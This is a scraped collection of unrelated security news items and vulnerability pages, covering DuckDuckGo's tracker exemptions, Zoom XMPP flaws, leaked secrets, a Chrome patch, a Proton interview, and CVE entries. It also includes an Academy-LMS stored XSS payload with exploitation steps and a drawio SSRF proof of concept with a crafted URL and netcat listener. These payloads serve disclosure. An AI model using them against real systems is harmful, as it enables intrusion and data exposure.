By Waqas
The privacy-oriented search engine and browser provider DuckDuckGo has received flak after a researcher identified Microsoft Trackers in…
This is a post from HackRead.com Read the original post: DuckDuckGo Allows Microsoft Trackers Despite No Tracking Policy – Researcher

The privacy-oriented search engine and browser provider DuckDuckGo has received flak after a researcher identified Microsoft Trackers in the company’s “private” web browser.

DuckDuckGo (DDG) has always promoted and marketed itself as a privacy-centric company that refrains from adding trackers to its products. The company boasted about launching a Private browser with default tracker blocking capabilities.

However, now, research revealed that the browser offers restricted tracking protection, and there are certain loopholes left to facilitate advertising data requests from Microsoft.

It is worth noting that Microsoft is a syndication partner of DuckDuckGo. Since the companies agree on syndicated search content, the DDG browser allows Microsoft trackers on 3rd party websites.

**Research Revealed Disturbing Facts**

According to researcher Zach Edwards, who shared his startling findings on the DuckDuckGo browser on Twitter, he discovered that DuckDuckGo’s mobile browsers didn’t block ad requests from Microsoft scripts as well as non-Microsoft web services.

When Edward examined the browser data flow on Workplace.com, he learned that although DDG informed its users about blocking Facebook and Google trackers, it allowed Microsoft trackers to receive data flows linked with the user’s browsing activities on a non-Microsoft site.

For your information, DuckDuckGo is a search engine that claims it never tracks user searches or behavior and never builds users’ profiles to display targeted ads, and only uses contextual ads from its partners, including Ads by Microsoft. Microsoft ads can track users’ IP addresses and other data after clicking on an ad link.

Researcher Zach Edwards on Twitter

**More DuckDuckGo and Search Engine News**

1.  What Are Dark Web Search Engines and How to Find Them?
2.  $4 billion lawsuit claims Google tracked iPhone users’ activities
3.  DuckDuckGo study claims Google Incognito searches are not private
4.  DuckDuckGo collecting user browsing data without consent (Updated)
5.  Camera privacy bug found in Firefox Android in 2019 hasn’t been fixed yet

DuckDuckGo’s privacy and no tracking policy

**DuckDuckGo CEO’s Response**

In response to Edwards’ tweets, DDG’s founder/CEO Gabe Weinberg tried to rubbish the findings by focusing more on the stuff their browser did block, including third-party cookies, even from Microsoft, tracker blocking, and HTTPS-always encryption service.

Moreover, Weinberg noted that the data flow issue was unrelated to DDG’s search engine. However, the DuckDuckGo browser has an exemption from blocking ad data transfers to subsidiaries of Microsoft like LinkedIn or Bing.

The data can be used to conduct cross-site tracking of users to display targeted advertisements. Weinberg, however, confirmed that their browser does allow Microsoft tracker 3rd party websites due to the agreement.

> “For non-search tracker blocking (e.g., in our browser), we block most third-party trackers. Unfortunately, our Microsoft search syndication agreement prevents us from doing more to Microsoft-owned properties. However, we have been continually pushing and expect to be doing more soon.”
> 
> Gabe Weinberg on Twitter

> “We have always been extremely careful to never promise anonymity when browsing because that frankly isn’t possible given how quickly trackers change how they work to evade protections and the tools we currently offer. When most other browsers on the market talk about tracking protection, they are usually referring to 3rd-party cookie protection and fingerprinting protection, and our browsers for iOS, Android, and our new Mac beta, impose these restrictions on third-party tracking scripts, including those from Microsoft.
> 
> What we’re talking about here is above-and-beyond protection that most browsers don’t even attempt to do — that is, blocking third-party tracking scripts before they load on 3rd party websites. Because we’re doing this where we can, users are still getting significantly more privacy protection with DuckDuckGo than they would be using Safari, Firefox, and other browsers. (…) Our goal has always been to provide the most privacy we can in one download, by default without any complicated settings.”
> 
> Weinberg to Bleeping Computer

Nevertheless, whatever may be the case, the issue seriously undermines the privacy claims made by DuckDuckGo for so long.

**More Privacy News**

1.  How data collected in gaming can be used to breach user privacy
2.  LinkedIn was copying every keystroke of users until iOS 14 exposed it
3.  Massive privacy risk as hacker sold 2 million MyFreeCams user records
4.  Israeli firm Kape Technologies buys ExpressVPN raising privacy concerns
5.  Hackers used macOS 0-days to bypass privacy features, take screenshots

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

DuckDuckGo Allows Microsoft Trackers Despite No Tracking Policy – Researcher

An issue was discovered in the Linux Kernel from 4.18 to 4.19, an improper update of sock reference in TCP pacing can lead to memory/netns leak, which can be used by remote clients.

**Welcome to Gitee**

Continue with Google

Continue with Github

OR

please enter your vaild email

Continue with Email

By creating an account, you agree to the Terms of Use as well as Non-active Account Processing Specification

如果您是中国用户，可以 跳转到中文版登陆页 ，或者中文版注册页

return

**No Gitee account related to this email**

**Only one step left to create a account**

email

verification code

Send me the verification code

Resend

Create account

return

**Your email has a Gitee account**

**If Gitee account is yours, please bind it with your account by verifying your password**

Yes，that's mine

Go Back

return

**This will bind your account with Gitee account. If it's binding another account,it will unbind first.**

email

password

Log in

Forget password?

CVE-2022-1678: Login - Gitee.com

Academy-LMS v4.3 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the SEO panel.

    # Exploit Title: Academy-LMS 4.3 - Stored XSS
    # Date: 19/12/2020
    # Vendor page: https://academy-lms.com/
    # Version: 4.3
    # Tested on Win10 and Google Chrome
    # Exploit Author: Vinicius Alves
    
    # XSS Payload: "><h1>STORED XSS</h1> (Scripts tag blocked)
    
    1) Access LMS and log in to admin panel
    2) Access courses page
    3) Open course manager and SEO menu
    4) Paste the XSS Payload tag and Submit
    5) Access the course page on frontend
    6) Exploited!

CVE-2022-29380: Offensive Security’s Exploit Database Archive

The Google Project Zero researcher found a bug in XML parsing on the Zoom client and server.

The Google Project Zero researcher found a bug in XML parsing on the Zoom client and server.

Zoom patched a medium-severity flaw, advising Windows, macOS, iOS and Android users to update their client software to version 5.10.0.

The Google Project Zero security researcher Ivan Fratric noted in a report that an attacker can exploit a victim’s machine over a zoom chat. The bug, tracked as CVE-2022-22787, has a CVSS severity rating of 5.9.

“User interaction is not required for a successful attack. The only ability an attacker needs is to be able to send messages to the victim over Zoom chat over XMPP protocol,” Ivan explained.

So called zero-click attacks do not require users take any action and are especially potent given even the most tech-savvy of users can fall prey to them.

XMPP stands for Extensible Messaging Presence Protocol and is used to send XML elements called stanzas over a stream connection to exchange messages and presence information in real-time. This messaging protocol is used by Zoom for its chat functionality.

In a security bulletin published by Zoom, the CVE-2022-22786 (CVSS score 7.5) affects the Windows users, while the other CVE-2022-22784, CVE-2022-22785, and CVE-2022-22787 impacted Zoom client versions before 5.10.0 running on Android, iOS, Linux, macOS, and Windows systems.

****Working of Bug**  **

The initial vulnerability described by Ivan as  “XMPP stanza smuggling” abuses the parsing inconsistencies between XML parser in Zoom client and server software to “smuggle” arbitrary XMPP stanzas to the victim machine.

An attacker sending a specially crafted control stanza can force the victim client to connect with a malicious server thus leading to a variety of attacks from spoofing messages to sending control messages.

Ivan noted that “the most impactful vector” in XMPP stanza smuggling vulnerability is an exploit of “ClusterSwitch task in the Zoom client, with an attacker-controlled “web domain” as a parameter”.

Zoom Patches ‘Zero-Click’ RCE Bug

If one word could sum up the 2021 infosecurity year (well, actually three), it would be these: "supply chain attack". 
A software supply chain attack happens when hackers manipulate the code in third-party software components to compromise the 'downstream' applications that use them. In 2021, we have seen a dramatic rise in such attacks: high profile security incidents like the SolarWinds,

If one word could sum up the 2021 infosecurity year (well, actually three), it would be these: "supply chain attack".

A software supply chain attack happens when hackers manipulate the code in third-party software components to compromise the 'downstream' applications that use them. In 2021, we have seen a dramatic rise in such attacks: high profile security incidents like the SolarWinds, Kaseya, and Codecov data breaches have shaken enterprise's confidence in the security practices of third-party service providers.

What does this have to do with secrets, you might ask? In short, a lot. Take the Codecov case (we'll go back to it quickly): it is a textbook example to illustrate how hackers leverage hardcoded credentials to gain initial access into their victims' systems and harvest more secrets down the chain.

Secrets-in-code remains one of the most overlooked vulnerabilities in the application security space, despite being a priority target in hackers' playbooks. In this article, we will talk about secrets and how keeping them out of source code is today's number one priority to secure the software development lifecycle.

**What is a secret?**

Secrets are digital authentication credentials (API keys, certificates, tokens, etc.) that are used in applications, services or infrastructures. Much like a password (plus a device in case of 2FA) is used to authenticate a person, a secret authenticates systems to enable interoperability. But there is a catch: unlike passwords, secrets are meant to be distributed.

To continually deliver new features, software engineering teams need to interconnect more and more building blocks. Organizations are watching the number of credentials in use across multiple teams (development squad, SRE, DevOps, security etc.) explode. Sometimes developers will keep keys in an insecure location to make it easier to change the code, but doing so often results in the information mistakenly being forgotten and inadvertently published.

In the application security landscape, hardcoded secrets are really a different type of vulnerability. First, since source code is a very leaky asset, meant to be cloned, checked out, and forked on multiple machines very frequently, secrets are leaky too. But, more worryingly, let's not forget that code also has a memory.

Any codebase is managed with some kind of version control system (VCS), keeping a historical timeline of all the modifications ever made to it, sometimes over decades. The problem is that still-valid secrets can be hiding anywhere on this timeline, opening a new dimension to the attack surface. Unfortunately, most security analyses are only done on the current, ready-to-be-deployed, state of a codebase. In other words, when it comes to credentials living in an old commit or even a never-deployed branch, these tools are totally blind.

**Six million secrets pushed to GitHub**

Last year, monitoring the commits pushed to GitHub in real-time, GitGuardian detected more than 6 million leaked secrets, doubling the number from 2020. On average, 3 commits out of 1,000 contained a credential, which is fifty percent higher than last year.

A large share of those secrets was giving access to corporate resources. No wonder then that an attacker looking to gain a foothold into an enterprise system would first look at its public repositories on GitHub, and then at the ones owned by its employees. Many developers use GitHub for personal projects and can happen to leak by mistake corporate credentials (yes, it happens regularly!).

With valid corporate credentials, attackers operate as authorized users, and detecting abuse becomes difficult. The time for a credential to be compromised after being pushed to GitHub is a mere 4 seconds, meaning it should be immediately revoked and rotated to neutralize the risk of being breached. Out of guilt, or lacking technical knowledge, we can see why people often take the wrong path to get out of this situation.

Another bad mistake for enterprises would be to tolerate the presence of secrets inside non-public repositories. GitGuardian's State of Secrets Sprawl report highlights the fact that private repositories hide much more secrets than their public equivalent. The hypothesis here is that private repositories give the owners a false sense of security, making them a bit less concerned about potential secrets lurking in the codebase.

That's ignoring the fact that these forgotten secrets could someday have a devastating impact if harvested by hackers.

To be fair, application security teams are well aware of the problem. But the amount of work to be done to investigate, revoke and rotate the secrets committed every week, or dig through years of uncharted territory, is simply overwhelming.

**Headline breaches... and the rest**

However, there is an urgency. Hackers are actively looking for "dorks" on GitHub, which are easily recognized patterns to identify leaked secrets. And GitHub is not the only place where they can be active, any registry (like Docker Hub) or any source code leak can potentially become a goldmine to find exploitation vectors.

As evidence, you just have to look at recently disclosed breaches: a favorite of many open-source projects, Codecov is a code coverage tool. Last year, it was compromised by attackers who gained access by extracting a static cloud account credential from its official Docker image. After having successfully accessed the official source code repository, they were able to tamper with a CI script and harvest hundreds of secrets from Codecov's user base.

More recently, Twitch's entire codebase was leaked, exposing more than 6,000 Git repositories and 3 million documents. Despite lots of evidence demonstrating a certain level of AppSec maturity, nearly 7,000 secrets could be surfaced! We are talking about hundreds of AWS, Google, Stripe, and GitHub keys. Just a few of them would be enough to deploy a full-scale attack on the company's most critical systems. This time no customer data was leaked, but that's mostly luck.

A few years ago, Uber was not so lucky. An employee accidentally published some corporate code on a public GitHub repository, that was his own. Hackers found out and detected a cloud service provider's keys granting access to Uber's infrastructure. A massive breach ensued.

The bottom line is that you can't really be sure when a secret will be exploited, but what you must be aware of is that malicious actors are monitoring your developers, and they are looking for your code. Also keep in mind that these incidents are just the tip of the iceberg, and that probably many more breaches involving secrets are not publicly disclosed.

**Conclusion**

Secrets are a core component of any software stack, and they are especially powerful, therefore they require very strong protection. Their distributed nature and the modern software development practices make it very hard to control where they end up, be it source code, production logs, Docker images, or instant messaging apps. Secrets detection and remediation capability is a must because even secrets can be exploited in an attack leading to a major breach. Such scenarios happen every week and as more and more services and infrastructure are used in the enterprise world, the number of leaks is growing at a very fast rate. The earlier action is taken, the easier it is to protect source code from future threats.

_**Note -** This article is written by Thomas Segura, technical content writer at GitGuardian. Thomas has worked as both an analyst and software engineer consultant for various big French companies._

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

How Secrets Lurking in Source Code Lead to Major Breaches

Google has issued an update for the Chrome browser to patch 32 security issues . One of the vulnerabilities is rated as critical, so install that update as soon as you can.
The post Update now! Multiple vulnerabilities patched in Google Chrome appeared first on Malwarebytes Labs.

Google has announced an update for the Chrome browser that includes 32 security fixes. The severity rating for one of the patched vulnerabilities is **Critical**.

The stable channel was promoted to 102.0.5005.61/62/63 for Windows, and 102.0.5005.61 for Mac and Linux.

**Critical**

Google rates vulnerabilities as critical if they allow an attacker to run arbitrary code on the underlying platform with the user’s privileges in the normal course of browsing.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

This update patches the critical vulnerability listed as CVE-2022-1853: Use after free in Indexed DB.

Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

IndexedDB is a low-level Application Programming Interface (API) for client-side storage of significant amounts of structured data, including files. This API uses indexes to enable high performance searches of this data. While Document Object Model (DOM) Storage is useful for storing smaller amounts of data, IndexedDB provides a solution for storing larger amounts of structured data.

Each IndexedDB database is unique to an origin (typically, this is the site domain or subdomain), meaning it should not be accessible by any other origin.

Google does not disclose details about vulnerabilities until users have had ample opportunity to install the patches, so I could be reading this wrong. But my guess is that an attacker could construct a specially crafted website and take over the visitor’s browser by manipulating the IndexedDB.

**Other vulnerabilities**

Of the remaining 31 vulnerabilities, Google has rated 12 as **High**. High severity vulnerabilities allow an attacker to execute code in the context of, or otherwise impersonate, other origins.

Another 13 vulnerabilities were rated as **Medium**. Medium severity bugs allow attackers to read or modify limited amounts of information, or which are not harmful on their own but potentially harmful when combined with other bugs.

Which leaves six vulnerabilities that were rated as **Low**. Low severity vulnerabilities are usually bugs that would normally be a higher severity, but which have extreme mitigating factors or a highly limited scope.

**How to update**

If you’re a Chrome user on Windows, Mac, or Linux, you should update to version 101.0.4951.41 as soon as possible.

The easiest way to update Chrome is to allow it to update automatically, which uses the same method as outlined below but doesn’t need you to do anything. But you can end up blocking automatic updates if you never close the browser, or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities listed.

My preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

You should then see the message, “Chrome is up to date”.

Affected systems:

*   Google Chrome for Windows versions prior to 102.0.5005.61/62/63
*   Google Chrome for Mac and Linux versions prior to 102.0.5005.61

Stay safe, everyone!

Update now! Multiple vulnerabilities patched in Google Chrome

The encrypted-email company, popular with security-conscious users, has a plan to go mainstream.

Since its founding in 2014, ProtonMail has become synonymous with user-friendly encrypted email. Now the company is trying to be synonymous with a whole lot more. On Wednesday morning, it announced that it’s changing its name to, simply, Proton—a nod at its broader ambitions within the universe of online privacy. The company will now offer an “ecosystem” of linked products, all accessed via one paid subscription. Proton subscribers will have access not just to encrypted email, but also an encrypted calendar, file storage platform, and VPN.

This is all part of CEO Andy Yen’s master plan to give Proton something close to a fighting chance against tech giants like Google. A Taiwanese-born former particle physicist, Yen moved to Geneva, Switzerland, after grad school to work at CERN, the nuclear research facility. Geneva proved a natural place to pivot to a privacy-focused startup, thanks to both Switzerland’s privacy-friendly legal regime and to a steady crop of poachable physicists. Today, Yen presides over a company with more than 400 employees and nearly 70 million users. He recently spoke to WIRED about the enduring need for greater privacy, the dangers of Apple's and Google's dominance, and how today’s attacks on encryption recall the rhetorical tactics of the War on Terror.

This interview has been condensed and lightly edited.

**WIRED: You're in the online privacy business. To start super broadly, how do you define privacy?**

**Andy Yen**: These days, all Google and Apple and Big Tech talk about is privacy, so the best way to give our definition is to give the contrast. The way Google defines privacy is, “Nobody can exploit your data, except for us.” Our definition is cleaner, more simple, and more authentic: Nobody can exploit your data—period. We literally want to build things that give us access to as little data as possible. The use of end-to-end encryption and zero-access encryption allows that. Because fundamentally, we believe the best way to protect user data is to not have it in the first place.

**If you ask someone, “Would you like more privacy or less?” they always say more. But if you watch how people actually behave, for most people, data privacy is not a very high priority. Why do you think that is?**

Privacy is inherent to being human. We have curtains on the windows, we have locks on our doors. But we tend to disconnect the digital world from the physical world. So if you take the analogy of Google, it's someone that's following you around every single day, recording everything that you say and every place you visit. In real life, we would never tolerate that. On the internet, somehow, because it's not visible, we tend to think that it's not there. But the surveillance that you don't notice tends to be far more insidious than the one that you do.

**Your company has come out in support of reforms to strengthen antitrust enforcement. But a lot of people argue that privacy and competition are in conflict. Apple will say, “If you force us to allow more competition on the platform that we run, then that will reduce our control over the security and the privacy of the user. So if you make us increase competition, that will bring privacy down.” And then you see the flip side of the argument, which is when Apple or Google implements some new privacy feature that may hurt competitors. How do you think about these potential conflicts?**

What Apple is basically claiming is, you need to let us continue our use of app store practices because we're the only company in the world that can get privacy right. It’s an attempt to monopolize privacy, which I don’t think makes any sense.

If you look at the FTC lawsuit against Facebook, the theory is that privacy and competition are two sides of the same coin. If you're not happy with Facebook's privacy practices, what is the alternative social media that you can go to other than Facebook and Instagram? You don't really have that many options. We need more players out there. If they had to compete, then competition would force privacy to be a selling point.

The same is true for other services that we offer. Today, Google controls the Android operating system, which is used by the majority of people, and they can preload all their applications as a default on your user devices. So they have a massive advantage already because users don't change the defaults. So even though their privacy practices are quite terrible for most people, there's no real pressure to change it because the alternatives don't really exist. And if they do exist, Google's able to hide them, because they set the defaults on their devices. So if you want to fix the privacy issue, the best way to do it is to have more competition, because then there will be user choice, and users tend to choose what is more private, because, as you said, everybody wants more privacy.

**Europe’s new Digital Market Act has a controversial section requiring the biggest messaging platforms to let competitors interoperate with them, while still preserving end-to-end encryption. But quite a lot of people** **argue** **that you can't actually do both of those things. So here's a place where privacy and competition really do seem to be conflicting with each other technologically.**

I have to say, this has been around since the early '90s. PGP is basically interoperable encryption, based on the email standard. So it may not be technologically the easiest to do. But to say it’s technologically impossible is also not correct.

**Another EU proposal** **would require companies to implement methods of detecting child sex abuse material, or CSAM, on their platforms. People are very alarmed about the implications of that for encryption.**

We're still in the process of analyzing it, so I can’t comment specifically on the details of the proposal. But these proposals are not new. In fact, they've been coming up in various forms over the past decade. What is novel and different this time is that these proposals used to be packaged under “terrorism.” Now, they’re packaged under CSAM. It was very clever to repackage this idea into a topic that is even more toxic, which makes informed debate difficult. Obviously, CSAM is a horrible problem, something that the world is better without. But a wholesale attack on encryption can have unforeseeable consequences that are not always completely understood or considered by the drafters of these proposals.

**Do you think that this** _**is**_ **a wholesale attack on encryption, though? The people making these proposals say, “We're not attacking encryption. You just have to figure out a way to monitor for CSAM.”**

Well, there is really no practical way in today's technology to do that in a way that doesn't weaken encryption.

**The analogy to terrorism is interesting because, during the Bush-era War on Terror, there was a sense of literally anything being justified in the name of stopping terrorism. The US government was secretly spying on its own citizens. It was really hard to argue that we have to accept that some terrorism is going to happen. It's even harder to say, look, we've got to accept that some amount of child exploitation is going to happen and people are going to use digital tools to spread it. But at some point, I think you do have to defend the principle that we have to tolerate a certain amount of even the very worst things if we want to have meaningful civil liberties.**

If there was no privacy in the world, that world would be more “secure.” But that world does exist; it's called North Korea. And the people that live there probably don't feel very secure. As a democracy, you have to strike the right balance. The balance is not total mass surveillance of everybody, because we know that there are serious consequences to democracy and freedom as a result of that. It's not easy to find the right balance. But during the Bush years, with terrorism, I think they went to an extreme that really was a backsliding on democracy. And this is something that we need to avoid.

**But then on the flip side,** **you read stories** **about law enforcement catching really bad criminals, and in a lot of those stories, if that person had used a Tor browser and a ProtonMail account and a VPN, and so on, they might not have been caught. Do you ever worry about a future where all the bad guys get smart enough to use the best privacy tools, and it becomes too easy to evade the legal system entirely?**

Well, encryption and privacy technologies are what I would call dual-use. What is law enforcement also concerned about these days? People’s information being stolen, sensitive communications being hacked, emails of political campaigns being stolen by state actors and disseminated to shift the political balance. In order to prevent all of those potential ills, you need privacy, encryption, and good security. So, the same tools that people in law enforcement criticize are actually the same things that are shielding a lot of the internet ecosystem and the economy from a disastrous outcome. If you were to weaken or prohibit all of these security tools and privacy tools, then you would open the floodgate to a massive amount of cybercrime and data breaches.

**Proton has grown a lot over the years, but it’s still basically a rounding error compared to something like Google. We’ve talked about competition from a regulatory perspective, but on a practical level, how do you even try to compete with your massive rivals?**

The current plan is the launch of the Proton ecosystem. It's one account that gives you access to four privacy services: Proton Mail, Proton Calendar, Proton Drive, and Proton VPN. One subscription that gives you access to all those services. It's the first time anybody has taken a series of privacy services and combined them to form a consolidated ecosystem. That doesn't match all of Big Tech’s offerings, of course. But I think it provides, for the first time, a viable alternative that lets people say, “If I really want to get off of Google, I can now do it, because I have enough components to live a lot of my daily life.” For the first time, you’ll have a privacy option that’s not fully competitive with Google, but reasonably competitive, and that will start to break the dam. I don't know how it will go, but I think this is the future of privacy, and that’s why we're doing it.

**This is probably the first time I have ever thought about having an encrypted calendar.**

A calendar is essentially a record of your life: everybody you've met, everywhere you’ve been, everything that you have done. It's extremely sensitive. So you don't intuitively think about protecting that, but actually, it's essential.

**And by making that encrypted, who am I protecting that information from?**

Maybe it's the government requesting information on you. Maybe it's a data leak. Maybe it's a change in business model of your cloud provider at some point in the future that decides that they want to monetize user data in a different way. Your data is just one acquisition away from going across the border to a country that you didn't expect when you signed up for the service.

**Right. Elon Musk is about to own all my Twitter DMs.**

Exactly right. And with end-to-end encryption, no matter what happens, it's your data; you control it. It's just a mathematical guarantee.

**But what if I move all my stuff to the Proton ecosystem, and then like four years from now, you go out of business? What happens to my stuff?**

Proton has been around for eight years now. In the tech space, that's a long time. I think an indicator of what is sustainable in the long term is alignment between the business and the customers. Our business model is simple: Premium users pay us to keep theie data private, and our only incentive is to keep it private. Sometimes the easiest and simplest models are the ones that are the most durable. I strongly believe that Proton will be a company that outlives us.

Proton Is Trying to Become Google—Without Your Data

Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.

**Description**

The problem came from this line of code

I ran docker-drawio with following command :

docker run -it --rm --name="draw" -e EXPORT_URL=http://somesite.com -p 8080:8080 -p 8443:8443 jgraph/drawio

if the drawio EXPORT_URL is set to an address without any / after the primary Hostname like http://somesite.com( not like http://somesite.com/something or http://somesite.com/), then an attacker can send a request to 127.0.0.1:4431 with a payload like http://draio-instance/service/0/@127.0.0.1:4431

**Proof of Concept**

1.  run docker run -it --rm --name="draw" -e EXPORT_URL=http://google.com -p 8080:8080 -p 8443:8443 jgraph/drawio and then docker ps and get the drawio hash name ( called HN)
2.  run docker exec -it HN /bin/bash
3.  run apt update && apt install netcat && netcat -l 4430
4.  go to http://draio-instance:8080/service/0/@127.0.0.1:4431 you can see the http log on netcat had been recorded

it is a Full SSRF If you need another POC I can give you an HTTP logger script that returns some things to the attacker

Also, I don't know what exactly is JSESSIONID cookie? but I can receive its content in a My public IP after redirect too!

**Impact**

The impact is achieved to all internal http webservers' contents if they host a file with a short and enumerable name! Or get cloud metadata, port scanning, and some special cases achieve RCE too!

However, it is an Open-redirect too.

about the CVSS: Attack Complexity is high because this vulnerability depends on some special configuration for EXPORT\_URL. Availability is none Confidentiality and Availability can be high as it is a full SSRF.

I think 7.4 is a good score if you don't please tell me to change it, please.

CVE-2022-1815: SSRF in /service endpoint in drawio

Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.
Tracked from CVE-2022-22784 through CVE-2022-22787, the issues range between 5.9 and 8.1 in severity. Ivan Fratric of Google

Popular video conferencing service Zoom has resolved as many as four security vulnerabilities, which could be exploited to compromise another user over chat by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages and execute malicious code.

Tracked from CVE-2022-22784 through CVE-2022-22787, the issues range between 5.9 and 8.1 in severity. Ivan Fratric of Google Project Zero has been credited with discovering and reporting all the four flaws in February 2022.

The list of bugs is as follows -

*   **CVE-2022-22784** (CVSS score: 8.1) - Improper XML Parsing in Zoom Client for Meetings
*   **CVE-2022-22785** (CVSS score: 5.9) - Improperly constrained session cookies in Zoom Client for Meetings
*   **CVE-2022-22786** (CVSS score: 7.5) - Update package downgrade in Zoom Client for Meetings for Windows
*   **CVE-2022-22787** (CVSS score: 5.9) - Insufficient hostname validation during server switch in Zoom Client for Meetings

With Zoom's chat functionality built on top of the XMPP standard, successful exploitation of the issues could enable an attacker to force a vulnerable client to masquerade a Zoom user, connect to a malicious server, and even download a rogue update, resulting in arbitrary code execution stemming from a downgrade attack.

Fratric dubbed the zero-click attack sequence as a case of "XMPP Stanza Smuggling," adding "one user might be able to spoof messages as if coming from another user" and that "an attacker can send control messages which will be accepted as if coming from the server."

At its core, the issues take advantage of parsing inconsistencies between XML parsers in Zoom's client and server to "smuggle" arbitrary XMPP stanzas — a basic unit of communication in XMPP — to the victim client.

Specifically, the exploit chain can be weaponized to hijack the software update mechanism and make the client connect to a man-in-the-middle server that serves up an old, less secure version of the Zoom client.

While the downgrade attack singles out the Windows version of the app, CVE-2022-22784, CVE-2022-22785, and CVE-2022-22787 impact Android, iOS, Linux, macOS, and Windows.

The patches arrive less than a month after Zoom addressed two high-severity flaws (CVE-2022-22782 and CVE-2022-22783) that could lead to local privilege escalation and exposure of memory content in its on-premise Meeting services. Also fixed was another instance of a downgrade attack (CVE-2022-22781) in Zoom's macOS app.

Users of the application are recommended to update to the latest version (5.10.0) to mitigate any potential threats arising out of active exploitation of the flaws.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Zoom Flaws Could Let Attackers Hack Victims Just by Sending them a Message

A stored cross-site scripting (XSS) vulnerability in /scas/?page=clubs/application_form&id=7 of School Club Application System v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.

Submitted by oretnom23 on Thursday, April 7, 2022 - 17:48.

****Introduction****

This simple project is a **School Clubs Application System**. This is a web-based application project developed in **PHP** and **MySQL Database**. this application provides an online platform for exploring the different clubs in certain schools and submitting a membership application. This project has a simple and pleasant user interface using **Material Kit 2 Template** and **Bootstrap 5 Framework**. It consists of user-friendly features and functionalities.

****About the School Clubs Application System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Google Material Icon**
*   **Material Kit 2 Template**

This **School Clubs Application System** is accessible to the **School Management, Club's Admin/Staff, and Students**. The **Management Site** is the side of the system where the school management has the privilege to access and manage the list of the school's student clubs. This site requires the **Admin Type** user credentials in order to gain access to the features and functionalities of this site. The **admin users** are the only ones who can register the **Club's Admin/Staff Users**. The **Club's Admin/Staff site** is the side of the application where the admin or staff of a certain club can manage the membership applications to their club submitted on the system. They can also update the application status. They can also view the basic information of the applicant including their contact information where they can reach back to the application according to their application. The students can access only the public site of the application where they are allowed to explore the active clubs of the school and read the information about each club.

****Features********Admin-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Club Management**
    *   Add New Club
    *   List All Clubs
    *   View Club Details
    *   Edit Club Details
    *   Delete Club Details
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Club's Admin/Staff-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Application Management**
    *   Add New Application
    *   List All Applications
    *   View Application Details
    *   Edit Application Details
    *   Delete Application Details
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Public-Side****

*   **Home Page**
    *   Display the Welcome Content.
*   **'About Us' Content**
*   **List All Active Clubs**
*   **View Club's Details**
*   **Club's Application Form**
*   **Submit Application**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Public-Side's Club List****

****Admin-Side Home Page****

****Club Details (Admin-Side)****

****User Details (Admin-Side)****

****Club's Admin/Staff-Side Home Page****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project assets at https://www.dropbox.com/s/tocky9atdwtk1gs/scas\_assets.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded assets **zip** file**.
6.  **Copy** the extracted assets folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****scas\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****scas\_db.sql**** located inside the **database** folder.
10.  **Browse** the **School Clubs Application System** in a **browser**. i.e. ****http://localhost/scas/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **School Clubs Application System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1578 views

Tag

#google